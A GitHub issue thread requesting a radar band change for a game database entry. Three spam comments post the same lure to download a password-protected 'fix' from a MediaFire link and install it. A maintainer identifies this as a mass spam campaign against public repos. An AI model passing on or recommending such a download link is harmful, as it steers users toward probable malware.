### ISSUE TITLE
China, YLC-8E Band modification, avoiding simulation bug

### ISSUE THREAD

**Issue by Luigi-II** [PygmalionOfCyprus/cmo-db-requests#4972]
### DB Selector

DB3K

### Affected DBID(s)

sensor 7109

### Summary of Changes

Change the B/C band to single **C (UHF) band**.

### Sources

DB itself. 
https://www.militarydrones.org.cn/ylc-8e-radar-p00719p1.html

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Luigi-II** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

@PygmalionOfCyprus @Jkryos It's scary. Is this CMO-DB page being targeted by something nefarious?

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by PygmalionOfCyprus** [comment]
I doubt it's targeting the CMO page specifically. I think it probably just goes through public Github repos with open issues and a certain amount of traffic and targets them. The fake comment it posts doesn't really make sense on our particular page, where issues are more like unit requests, but it would make more sense on a "normal" repo where issues are actually reporting bugs and problems.

If you were posting an issue like "hey the app freezes when I do X, what should I do" and someone responded "To fix your trouble download this fix, I see it in another issue" etc. etc. you might be more tempted.

Just comes with the territory of being a big repo, I guess. I'll consider it a backhanded compliment. Report them to GH when you see 'em. Now if only they would ban the _actual_ spambots instead of our dutiful contributors...

**Comment by PygmalionOfCyprus** [comment]
Handled 509. Also applied to YLC-8B.
